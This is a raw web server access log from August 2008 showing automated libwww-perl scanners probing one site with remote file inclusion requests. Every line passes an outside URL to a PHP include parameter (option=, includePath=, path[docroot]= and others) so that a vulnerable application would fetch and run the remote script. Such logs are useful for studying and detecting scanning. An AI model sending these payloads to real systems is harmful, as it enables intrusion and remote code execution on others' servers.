91.121.14.8 - - [18/Aug/2008:13:28:47 -0700] "GET /logs/access_080321.log/index.php?option=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [18/Aug/2008:13:28:47 -0700] "GET /logs/index.php?option=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [18/Aug/2008:13:28:48 -0700] "GET /index.php?option=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 200 9869 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:13:28:57 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:13:28:57 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.172.129.75 - - [18/Aug/2008:13:29:04 -0700] "GET /logs/access_080621.log/claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:13:29:36 -0700] "GET /logs/access_080309.log//?custompluginfile[]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:13:29:45 -0700] "GET //?custompluginfile[]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 200 9906 "-" "libwww-perl/5.76" "www.dmulk.com"
